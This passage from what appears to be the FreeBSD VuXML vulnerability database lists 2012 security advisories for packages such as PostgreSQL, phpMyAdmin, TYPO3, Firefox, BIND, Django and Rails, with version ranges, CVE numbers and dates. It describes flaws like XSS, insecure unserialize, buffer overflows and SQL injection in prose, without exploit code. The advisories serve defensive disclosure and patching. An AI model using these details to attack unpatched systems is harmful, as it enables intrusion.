<range><gt>9.1.*</gt><lt>9.1.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PostgreSQL Global Development Group reports:</p>
<blockquote cite="http://www.postgresql.org/about/news/1407/">
<p>The PostgreSQL Global Development Group today released
security updates for all active branches of the PostgreSQL
database system, including versions 9.1.5, 9.0.9, 8.4.13 and
8.3.20. This update patches security holes associated with
libxml2 and libxslt, similar to those affecting other open
source projects. All users are urged to update their
installations at the first available opportunity.</p>
<p>Users who are relying on the built-in XML functionality to
validate external DTDs will need to implement a workaround, as
this security patch disables that functionality. Users who are
using xslt_process() to fetch documents or stylesheets from
external URLs will no longer be able to do so. The PostgreSQL
project regrets the need to disable both of these features in
order to maintain our security standards. These security issues
with XML are substantially similar to issues patched recently
by the Webkit (CVE-2011-1774), XMLsec (CVE-2011-1425) and PHP5
(CVE-2012-0057) projects.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3488</cvename>
<cvename>CVE-2012-3489</cvename>
<url>http://www.postgresql.org/about/news/1407/</url>
</references>
<dates>
<discovery>2012-08-17</discovery>
<entry>2012-08-17</entry>
</dates>
</vuln>
<vuln vid="db1d3340-e83b-11e1-999b-e0cb4e266481">
<topic>phpMyAdmin -- Multiple XSS in Table operations, Database structure, Trigger and Visualize GIS data pages</topic>
<affects>
<package>
<name>phpMyAdmin</name>
<range><lt>3.5.2.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The phpMyAdmin development team reports:</p>
<blockquote cite="http://www.phpmyadmin.net/home_page/security/PMASA-2012-4.php">
<p>Using a crafted table name, it was possible to produce an
XSS: 1) On the Database Structure page, creating a new
table with a crafted name 2) On the Database Structure page,
using the Empty and Drop links of the crafted table name 3)
On the Table Operations page of a crafted table, using the
'Empty the table (TRUNCATE)' and 'Delete the table (DROP)'
links 4) On the Triggers page of a database containing
tables with a crafted name, when opening the 'Add Trigger'
popup 5) When creating a trigger for a table with a crafted
name, with an invalid definition. Having crafted data in a
database table, it was possible to produce an XSS: 6) When
visualizing GIS data, having a crafted label name.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4345</cvename>
<url>http://www.phpmyadmin.net/home_page/security/PMASA-2012-4.php</url>
</references>
<dates>
<discovery>2012-08-12</discovery>
<entry>2012-08-17</entry>
</dates>
</vuln>
<vuln vid="48bcb4b2-e708-11e1-a59d-000d601460a4">
<topic>typo3 -- Multiple vulnerabilities in TYPO3 Core</topic>
<affects>
<package>
<name>typo3</name>
<range><ge>4.5.0</ge><lt>4.5.19</lt></range>
<range><ge>4.6.0</ge><lt>4.6.12</lt></range>
<range><ge>4.7.0</ge><lt>4.7.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>TYPO3 Security Team reports:</p>
<blockquote cite="https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-004/">
<p>It has been discovered that TYPO3 Core is vulnerable to Cross-Site
Scripting, Information Disclosure, Insecure Unserialize leading to
Arbitrary Code Execution.</p>
<p>TYPO3 Backend Help System - Due to a missing signature (HMAC) for a
parameter in the view_help.php file, an attacker could unserialize
arbitrary objects within TYPO3. We are aware of a working exploit,
which can lead to arbitrary code execution. A valid backend user
login or multiple successful cross site request forgery attacks are
required to exploit this vulnerability.</p>
<p>TYPO3 Backend - Failing to properly HTML-encode user input in
several places, the TYPO3 backend is susceptible to Cross-Site
Scripting. A valid backend user is required to exploit these
vulnerabilities.</p>
<p>TYPO3 Backend - Accessing the configuration module discloses the
Encryption Key. A valid backend user with access to the
configuration module is required to exploit this vulnerability.</p>
<p>TYPO3 HTML Sanitizing API - By not removing several HTML5
JavaScript events, the API method t3lib_div::RemoveXSS() fails to
filter specially crafted HTML injections, thus is susceptible to
Cross-Site Scripting. Failing to properly encode for JavaScript the
API method t3lib_div::quoteJSvalue(), it is susceptible to Cross-Site
Scripting.</p>
<p>TYPO3 Install Tool - Failing to properly sanitize user input, the
Install Tool is susceptible to Cross-Site Scripting.</p>
</blockquote>
</body>
</description>
<references>
<url>https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-004/</url>
</references>
<dates>
<discovery>2012-08-15</discovery>
<entry>2012-08-15</entry>
</dates>
</vuln>
<vuln vid="83f9e943-e664-11e1-a66d-080027ef73ec">
<topic>fetchmail -- two vulnerabilities in NTLM authentication</topic>
<affects>
<package>
<name>fetchmail</name>
<range><ge>5.0.8</ge><lt>6.3.21_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Matthias Andree reports:</p>
<blockquote cite="http://www.fetchmail.info/fetchmail-SA-2012-02.txt">
<p>With NTLM support enabled, fetchmail might mistake a server-side
error message during NTLM protocol exchange for protocol data,
leading to a SIGSEGV.</p>
<p>Also, with a carefully crafted NTLM challenge, a malicious server
might cause fetchmail to read from a bad memory location, betraying
confidential data. It is deemed hard, although not impossible, to
steal other accounts' data.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3482</cvename>
</references>
<dates>
<discovery>2012-08-12</discovery>
<entry>2012-08-14</entry>
<modified>2012-08-27</modified>
</dates>
</vuln>
<vuln vid="55b498e2-e56c-11e1-bbd5-001c25e46b1d">
<topic>Several vulnerabilities found in IcedTea-Web</topic>
<affects>
<package>
<name>icedtea-web</name>
<range><lt>1.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The IcedTea project team reports:</p>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=840592">
<p>CVE-2012-3422: Use of uninitialized instance pointers</p>
<p>An uninitialized pointer use flaw was found in the IcedTea-Web web
browser plugin. A malicious web page could use this flaw to make the
IcedTea-Web browser plugin pass an invalid pointer to a web browser.
Depending on the browser used, it may cause the browser to crash
or possibly execute arbitrary code.</p>
<p>The get_cookie_info() and get_proxy_info() functions call
getFirstInTableInstance() with the instance_to_id_map hash as
a parameter. If instance_to_id_map is empty (which can happen
when the plugin was recently removed), getFirstInTableInstance()
returns an uninitialized pointer.</p>
</blockquote>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=841345">
<p>CVE-2012-3423: Incorrect handling of non 0-terminated strings</p>
<p>It was discovered that the IcedTea-Web web browser plugin
incorrectly assumed that all strings provided by browser are NUL
terminated, which is not guaranteed by the NPAPI (Netscape Plugin
Application Programming Interface). When used in a browser that
does not NUL terminate NPVariant NPStrings, this could lead to
buffer over-read or over-write, resulting in possible information
leak, crash, or code execution.</p>
<p>Mozilla browsers currently NUL terminate strings, however recent
Chrome versions are known not to provide NUL terminated data.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3422</cvename>
<cvename>CVE-2012-3423</cvename>
<mlist>http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2012-July/019580.html</mlist>
</references>
<dates>
<discovery>2012-07-31</discovery>
<entry>2012-08-13</entry>
</dates>
</vuln>
<vuln vid="a14dee30-e3d7-11e1-a084-50e5492bd3dc">
<topic>libcloud -- possible SSL MITM due to invalid regexp used to validate target server hostname</topic>
<affects>
<package>
<name>py-libcloud</name>
<range><lt>0.11.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The libcloud development team reports:</p>
<blockquote cite="http://libcloud.apache.org/security.html">
<p>When establishing a secure (SSL / TLS) connection to a target server, an invalid regular
expression has been used for performing the hostname verification. A subset instead of the
full target server hostname has been marked as an acceptable match for the given hostname.
For example, a certificate with a hostname field of "aexample.com" was considered a valid
certificate for the domain "example.com".</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3446</cvename>
<url>http://seclists.org/fulldisclosure/2012/Aug/55</url>
</references>
<dates>
<discovery>2012-08-01</discovery>
<entry>2012-08-11</entry>
</dates>
</vuln>
<vuln vid="aca0d7e0-e38a-11e1-999b-e0cb4e266481">
<topic>phpMyAdmin -- Path disclosure due to missing library</topic>
<affects>
<package>
<name>phpMyAdmin</name>
<range><lt>3.5.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The phpMyAdmin development team reports:</p>
<blockquote cite="http://www.phpmyadmin.net/home_page/security/PMASA-2012-3.php">
<p>The show_config_errors.php script does not include a
library, so an error message shows the full path of this
file, leading to possible further attacks.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4219</cvename>
<url>http://www.phpmyadmin.net/home_page/security/PMASA-2012-3.php</url>
</references>
<dates>
<discovery>2012-08-03</discovery>
<entry>2012-08-11</entry>
</dates>
</vuln>
<vuln vid="31db9a18-e289-11e1-a57d-080027a27dbf">
<topic>rubygem-rails -- multiple vulnerabilities</topic>
<affects>
<package>
<name>rubygem-rails</name>
<range><lt>3.2.8</lt></range>
</package>
<package>
<name>rubygem-actionpack</name>
<range><lt>3.2.8</lt></range>
</package>
<package>
<name>rubygem-activesupport</name>
<range><lt>3.2.8</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Rails core team reports:</p>
<blockquote cite="http://weblog.rubyonrails.org/2012/8/9/ann-rails-3-2-8-has-been-released/">
<p>This version contains three important security fixes, please upgrade immediately.</p>
<p>One of the security fixes impacts all users and is related to the HTML escaping code. The
other two fixes impact people using select_tag's prompt option and the strip_tags
helper from ActionPack.</p>
<p>CVE-2012-3463 Potential XSS Vulnerability in select_tag prompt.</p>
<p>CVE-2012-3464 Potential XSS Vulnerability in the HTML escaping code.</p>
<p>CVE-2012-3465 XSS Vulnerability in strip_tags.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3463</cvename>
<cvename>CVE-2012-3464</cvename>
<cvename>CVE-2012-3465</cvename>
<url>https://groups.google.com/d/msg/rubyonrails-security/fV3QUToSMSw/eHBSFOUYHpYJ</url>
<url>https://groups.google.com/d/msg/rubyonrails-security/kKGNeMrnmiY/r2yM7xy-G48J</url>
<url>https://groups.google.com/d/msg/rubyonrails-security/FgVEtBajcTY/tYLS1JJTu38J</url>
<url>http://weblog.rubyonrails.org/2012/8/9/ann-rails-3-2-8-has-been-released/</url>
</references>
<dates>
<discovery>2012-08-08</discovery>
<entry>2012-08-10</entry>
</dates>
</vuln>
<vuln vid="8675efd5-e22c-11e1-a808-002354ed89bc">
<topic>sudosh -- buffer overflow</topic>
<affects>
<package>
<name>sudosh2</name>
<range><le>1.0.2</le></range>
</package>
<package>
<name>sudosh3</name>
<range><le>3.2.0_2</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISS reports:</p>
<blockquote cite="http://xforce.iss.net/xforce/xfdb/55903">
<p>sudosh2 and sudosh3 are vulnerable to a stack-based buffer
overflow, caused by improper bounds checking by the replay()
function. By persuading a victim to replay a specially-crafted
recorded sudo session, a local attacker could overflow a buffer
and execute arbitrary code on the system with elevated privileges
or cause the application to crash.</p>
</blockquote>
</body>
</description>
<references>
<url>http://xforce.iss.net/xforce/xfdb/55903</url>
<url>http://secunia.com/advisories/38349</url>
<url>http://secunia.com/advisories/38292</url>
</references>
<dates>
<discovery>2010-01-17</discovery>
<entry>2012-08-09</entry>
</dates>
</vuln>
<vuln vid="0f020b7b-e033-11e1-90a2-000c299b62e1">
<topic>FreeBSD -- named(8) DNSSEC validation Denial of Service</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_10</lt></range>
<range><ge>8.1</ge><lt>8.1_13</lt></range>
<range><ge>8.2</ge><lt>8.2_10</lt></range>
<range><ge>8.3</ge><lt>8.3_4</lt></range>
<range><ge>9.0</ge><lt>9.0_4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-12:05.bind.asc">
<p>BIND 9 stores a cache of query names that are known to be failing
due to misconfigured name servers or a broken chain of trust.
Under high query loads, when DNSSEC validation is active, it is
possible for a condition to arise in which data from this cache of
failing queries could be used before it was fully initialized,
triggering an assertion failure.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:05.bind</freebsdsa>
<cvename>CVE-2012-3817</cvename>
</references>
<dates>
<discovery>2012-07-24</discovery>
<entry>2012-08-07</entry>
</dates>
</vuln>
<vuln vid="36235c38-e0a8-11e1-9f4d-002354ed89bc">
<topic>automake -- Insecure 'distcheck' recipe granted world-writable distdir</topic>
<affects>
<package>
<name>automake</name>
<range><ge>1.5.0</ge><lt>1.12.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>GNU reports:</p>
<blockquote cite="https://lists.gnu.org/archive/html/automake/2012-07/msg00023.html">
<p>The recipe of the 'distcheck' target granted temporary
world-write permissions on the extracted distdir. This introduced
a locally exploitable race condition for those who run "make
distcheck" with a non-restrictive umask (e.g., 022) in a directory
that was accessible by others. A successful exploit would result
in arbitrary code execution with the privileges of the user
running "make distcheck".</p>
<p>It is important to stress that this vulnerability impacts not only
the Automake package itself, but all packages with
Automake-generated makefiles. For an effective fix it is necessary
to regenerate the Makefile.in files with a fixed Automake
version.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3386</cvename>
<url>https://lists.gnu.org/archive/html/automake/2012-07/msg00023.html</url>
</references>
<dates>
<discovery>2012-07-09</discovery>
<entry>2012-08-06</entry>
<modified>2012-08-25</modified>
</dates>
</vuln>
<vuln vid="dbf338d0-dce5-11e1-b655-14dae9ebcf89">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>14.0.1,1</lt></range>
<range><lt>10.0.6,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.6,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.11</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.6</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.11</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>14.0</lt></range>
<range><lt>10.0.6</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.6</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-42 Miscellaneous memory safety hazards (rv:14.0/
rv:10.0.6)</p>
<p>MFSA 2012-43 Incorrect URL displayed in addressbar through drag and
drop</p>
<p>MFSA 2012-44 Gecko memory corruption</p>
<p>MFSA 2012-45 Spoofing issue with location</p>
<p>MFSA 2012-46 XSS through data: URLs</p>
<p>MFSA 2012-47 Improper filtering of javascript in HTML feed-view</p>
<p>MFSA 2012-48 use-after-free in nsGlobalWindow::PageHidden</p>
<p>MFSA 2012-49 Same-compartment Security Wrappers can be bypassed</p>
<p>MFSA 2012-50 Out of bounds read in QCMS</p>
<p>MFSA 2012-51 X-Frame-Options header ignored when duplicated</p>
<p>MFSA 2012-52 JSDependentString::undepend string conversion results
in memory corruption</p>
<p>MFSA 2012-53 Content Security Policy 1.0 implementation errors
cause data leakage</p>
<p>MFSA 2012-54 Clickjacking of certificate warning page</p>
<p>MFSA 2012-55 feed: URLs with an innerURI inherit security context
of page</p>
<p>MFSA 2012-56 Code execution through javascript: URLs</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1949</cvename>
<cvename>CVE-2012-1950</cvename>
<cvename>CVE-2012-1951</cvename>
<cvename>CVE-2012-1952</cvename>
<cvename>CVE-2012-1953</cvename>
<cvename>CVE-2012-1954</cvename>
<cvename>CVE-2012-1955</cvename>
<cvename>CVE-2012-1957</cvename>
<cvename>CVE-2012-1958</cvename>
<cvename>CVE-2012-1959</cvename>
<cvename>CVE-2012-1960</cvename>
<cvename>CVE-2012-1961</cvename>
<cvename>CVE-2012-1962</cvename>
<cvename>CVE-2012-1963</cvename>
<cvename>CVE-2012-1964</cvename>
<cvename>CVE-2012-1965</cvename>
<cvename>CVE-2012-1966</cvename>
<cvename>CVE-2012-1967</cvename>
<url>http://www.mozilla.org/security/known-vulnerabilities/</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-42.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-43.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-44.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-45.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-46.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-47.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-48.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-49.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-50.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-51.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-52.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-53.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-54.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-55.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-56.html</url>
</references>
<dates>
<discovery>2012-07-17</discovery>
<entry>2012-08-02</entry>
</dates>
</vuln>
<vuln vid="de2bc01f-dc44-11e1-9f4d-002354ed89bc">
<topic>Apache -- Insecure LD_LIBRARY_PATH handling</topic>
<affects>
<package>
<name>apache</name>
<range><le>2.2.22_5</le></range>
</package>
<package>
<name>apache-event</name>
<range><le>2.2.22_5</le></range>
</package>
<package>
<name>apache-itk</name>
<range><le>2.2.22_5</le></range>
</package>
<package>
<name>apache-peruser</name>
<range><le>2.2.22_5</le></range>
</package>
<package>
<name>apache-worker</name>
<range><le>2.2.22_5</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Apache reports:</p>
<blockquote cite="http://httpd.apache.org/security/vulnerabilities_24.html">
<p>Insecure handling of LD_LIBRARY_PATH was found that could lead to
the current working directory being searched for DSOs. This could
allow a local user to execute code as root if an administrator runs
apachectl from an untrusted directory.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0883</cvename>
<url>http://httpd.apache.org/security/vulnerabilities_24.html</url>
<url>http://www.apache.org/dist/httpd/CHANGES_2.4.2</url>
</references>
<dates>
<discovery>2012-03-02</discovery>
<entry>2012-08-01</entry>
</dates>
</vuln>
<vuln vid="f01292a0-db3c-11e1-a84b-00e0814cab4e">
<topic>django -- multiple vulnerabilities</topic>
<affects>
<package>
<name>py26-django</name>
<range><ge>1.4</ge><lt>1.4.1</lt></range>
<range><ge>1.3</ge><lt>1.3.2</lt></range>
</package>
<package>
<name>py27-django</name>
<range><ge>1.4</ge><lt>1.4.1</lt></range>
<range><ge>1.3</ge><lt>1.3.2</lt></range>
</package>
<package>
<name>py26-django-devel</name>
<range><lt>20120731,1</lt></range>
</package>
<package>
<name>py27-django-devel</name>
<range><lt>20120731,1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Django project reports:</p>
<blockquote cite="https://www.djangoproject.com/weblog/2012/jul/30/security-releases-issued/">
<p>Today the Django team is issuing multiple releases --
Django 1.3.2 and Django 1.4.1 -- to remedy security issues
reported to us:</p>
<ul>
<li>Cross-site scripting in authentication views</li>
<li>Denial-of-service in image validation</li>
<li>Denial-of-service via get_image_dimensions()</li>
</ul>
<p>All users are encouraged to upgrade Django immediately.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3442</cvename>
<cvename>CVE-2012-3443</cvename>
<cvename>CVE-2012-3444</cvename>
<url>https://www.djangoproject.com/weblog/2012/jul/30/security-releases-issued/</url>
</references>
<dates>
<discovery>2012-07-30</discovery>
<entry>2012-07-31</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="58253655-d82c-11e1-907c-20cf30e32f6d">
<topic>bugzilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>3.6.0</ge><lt>3.6.10</lt></range>
<range><ge>4.0.0</ge><lt>4.0.7</lt></range>
<range><ge>4.2.0</ge><lt>4.2.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>A Bugzilla Security Advisory reports:</p>
<blockquote cite="http://www.bugzilla.org/security/3.6.9/">
<p>The following security issues have been discovered in
Bugzilla:</p>
<h1>Information Leak</h1>
<p>Versions: 4.1.1 to 4.2.1, 4.3.1</p>
<p>In HTML bugmails, all bug IDs and attachment IDs are
linkified, and hovering these links displays a tooltip
with the bug summary or the attachment description if
the user is allowed to see the bug or attachment.
But when validating user permissions when generating the
email, the permissions of the user who edited the bug were
taken into account instead of the permissions of the
addressee. This means that confidential information could
be disclosed to the addressee if the other user has more
privileges than the addressee.
Plain text bugmails are not affected as bug and attachment
IDs are not linkified.</p>
<h1>Information Leak</h1>
<p>Versions: 2.17.5 to 3.6.9, 3.7.1 to 4.0.6, 4.1.1 to
4.2.1, 4.3.1</p>
<p>The description of a private attachment could be visible
to a user who does not have permission to access this attachment
if the attachment ID is mentioned in a public comment in
a bug that the user can see.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1968</cvename>
<cvename>CVE-2012-1969</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=777398</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=777586</url>
</references>
<dates>
<discovery>2012-07-26</discovery>
<entry>2012-07-27</entry>
</dates>
</vuln>
<vuln vid="17f369dc-d7e7-11e1-90a2-000c299b62e1">
<topic>nsd -- Denial of Service</topic>
<affects>
<package>
<name>nsd</name>
<range><lt>3.2.13</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Tom Hendrikx reports:</p>
<blockquote cite="http://www.nlnetlabs.nl/downloads/CVE-2012-2979.txt">
<p>It is possible to crash (SIGSEGV) an NSD child server process by
sending it a DNS packet from any host on the internet when the per
zone stats build option is enabled. A crashed child process will
automatically be restarted by the parent process, but an attacker
may keep the NSD server occupied restarting child processes by
sending it a stream of such packets, effectively preventing the
NSD server from serving.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2979</cvename>
<url>http://www.nlnetlabs.nl/downloads/CVE-2012-2979.txt</url>
</references>
<dates>
<discovery>2012-07-27</discovery>
<entry>2012-07-27</entry>
</dates>
</vuln>
<vuln vid="ae2fa87c-4bca-4138-8be1-67ce2a19b3a8">
<topic>rubygem-actionpack -- Denial of Service</topic>
<affects>
<package>
<name>rubygem-actionpack</name>
<range><lt>3.2.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="https://groups.google.com/forum/?fromgroups#!topic/rubyonrails-security/vxJjrc15qYM">
<p>There is a DoS vulnerability in Action Pack digest authentication
handling in authenticate_or_request_with_http_digest.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3424</cvename>
<url>https://groups.google.com/forum/?fromgroups#!topic/rubyonrails-security/vxJjrc15qYM</url>
</references>
<dates>
<discovery>2012-07-26</discovery>
<entry>2012-07-26</entry>
</dates>
</vuln>
<vuln vid="cdc4ff0e-d736-11e1-8221-e0cb4e266481">
<topic>p5-RT-Authen-ExternalAuth -- privilege escalation</topic>
<affects>
<package>
<name>p5-RT-Authen-ExternalAuth</name>
<range><lt>0.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The RT development team reports:</p>
<blockquote cite="http://blog.bestpractical.com/2012/07/security-vulnerabilities-in-three-commonly-deployed-rt-extensions.html">
<p>RT::Authen::ExternalAuth 0.10 and below (for all versions
of RT) are vulnerable to an escalation of privilege attack
where the URL of a RSS feed of the user can be used to
acquire a fully logged-in session as that user.
CVE-2012-2770 has been assigned to this vulnerability.</p>
<p>Users of RT 3.8.2 and above should upgrade to
RT::Authen::ExternalAuth 0.11, which resolves this
vulnerability.</p>
</blockquote>
</body>
</description>
<references>
<url>http://blog.bestpractical.com/2012/07/security-vulnerabilities-in-three-commonly-deployed-rt-extensions.html</url>
<cvename>CVE-2012-2770</cvename>
</references>
<dates>
<discovery>2012-07-25</discovery>
<entry>2012-07-26</entry>
</dates>
</vuln>
<vuln vid="c7fa3618-d5ff-11e1-90a2-000c299b62e1">
<topic>isc-dhcp -- multiple vulnerabilities</topic>
<affects>
<package>
<name>isc-dhcp41-server</name>
<range><lt>4.1.e_5,2</lt></range>
</package>
<package>
<name>isc-dhcp42-server</name>
<range><lt>4.2.4_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="https://www.isc.org/announcement/bind-and-dhcp-security-updates-released">
<p>An unexpected client identifier parameter can cause the ISC DHCP
daemon to segmentation fault when running in DHCPv6 mode,
resulting in a denial of service to further client requests. In
order to exploit this condition, an attacker must be able to send
requests to the DHCP server.</p>
<p>An error in the handling of malformed client identifiers can cause
a DHCP server running affected versions (see "Impact") to enter a
state where further client requests are not processed and the
server process loops endlessly, consuming all available CPU
cycles.
Under normal circumstances this condition should not be
triggered, but a non-conforming or malicious client could
deliberately trigger it in a vulnerable server. In order to
exploit this condition an attacker must be able to send requests
to the DHCP server.</p>
<p>Two memory leaks have been found and fixed in ISC DHCP. Both are
reproducible when running in DHCPv6 mode (with the -6 command-line
argument.) The first leak is confirmed to only affect servers
operating in DHCPv6 mode, but based on initial code analysis the
second may theoretically affect DHCPv4 servers (though this has
not been demonstrated.)</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3570</cvename>
<cvename>CVE-2012-3571</cvename>
<cvename>CVE-2012-3954</cvename>
<url>https://kb.isc.org/article/AA-00714</url>
<url>https://kb.isc.org/article/AA-00712</url>
<url>https://kb.isc.org/article/AA-00737</url>
</references>
<dates>
<discovery>2012-07-24</discovery>
<entry>2012-07-25</entry>
</dates>
</vuln>
<vuln vid="0bc67930-d5c3-11e1-bef6-0024e81297ae">
<topic>dns/bind9* -- Heavy DNSSEC Validation Load Can Cause a 'Bad Cache' Assertion Failure</topic>
<affects>
<package>
<name>bind99</name>
<range><lt>9.9.1.2</lt></range>
</package>
<package>
<name>bind98</name>
<range><lt>9.8.3.2</lt></range>
</package>
<package>
<name>bind97</name>
<range><lt>9.7.6.2</lt></range>
</package>
<package>
<name>bind96</name>
<range><lt>9.6.3.1.ESV.R7.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="https://kb.isc.org/article/AA-00729">
<p>High numbers of queries with DNSSEC validation enabled can
cause an assertion failure in named, caused by using a 'bad cache'
data structure before it has been initialized.</p>
<p>BIND 9 stores a cache of query names that are known to be failing due
to misconfigured name servers or a broken chain of trust. Under high query
loads when DNSSEC validation is active, it is possible for a condition
to arise in which data from this cache of failing queries could be used
before it was fully initialized, triggering an assertion failure.</p>
<p>This bug cannot be encountered unless your server is doing DNSSEC
validation.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3817</cvename>
<url>https://kb.isc.org/article/AA-00729</url>
</references>
<dates>
<discovery>2012-07-24</discovery>
<entry>2012-07-24</entry>
</dates>
</vuln>
<vuln vid="748aa89f-d529-11e1-82ab-001fd0af1a4c">
<topic>rubygem-activerecord -- multiple vulnerabilities</topic>
<affects>
<package>
<name>rubygem-activemodel</name>
<range><lt>3.2.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>rubygem-activerecord -- multiple vulnerabilities</p>
<blockquote>
<p>Due to the way Active Record interprets parameters in
combination with the way that Rack parses query parameters, it
is possible for an attacker to issue unexpected database
queries with "IS NULL" where clauses. This issue does *not*
let an attacker insert arbitrary values into an SQL query,
however they can cause the query to check for NULL where most
users wouldn't expect it.</p>
<p>Due to the way Active Record handles nested query parameters,
an attacker can use a specially crafted request to inject some
forms of SQL into your application's SQL queries.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2660</cvename>
<cvename>CVE-2012-2661</cvename>
<url>https://groups.google.com/forum/?fromgroups#!topic/rubyonrails-security/8SA-M3as7A8</url>
<url>https://groups.google.com/forum/?fromgroups#!topic/rubyonrails-security/dUaiOOGWL1k</url>
</references>
<dates>
<discovery>2012-05-31</discovery>
<entry>2012-07-23</entry>
<modified>2012-07-23</modified>
</dates>
</vuln>
<vuln vid="bdab0acd-d4cd-11e1-8a1c-14dae9ebcf89">
<topic>php -- potential overflow in _php_stream_scandir</topic>
<affects>
<package>
<name>php5</name>
<range><gt>5.4</gt><lt>5.4.5</lt></range>
<range><ge>5.3</ge><lt>5.3.15</lt></range>
<range><ge>5.2</ge><lt>5.2.17_10</lt></range>
</package>
<package>
<name>php53</name>
<range><lt>5.3.15</lt></range>
</package>
<package>
<name>php52</name>
<range><lt>5.2.17_10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PHP Development Team reports:</p>
<blockquote cite="http://www.php.net/archive/2012.php#id2012-07-19-1">
<p>The releases of PHP 5.4.15 and 5.4.5 fix a potential overflow in
_php_stream_scandir.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2688</cvename>
<url>http://www.php.net/archive/2012.php#id2012-07-19-1</url>
</references>
<dates>
<discovery>2012-07-19</discovery>
<entry>2012-07-23</entry>
<modified>2013-01-15</modified>
</dates>
</vuln>
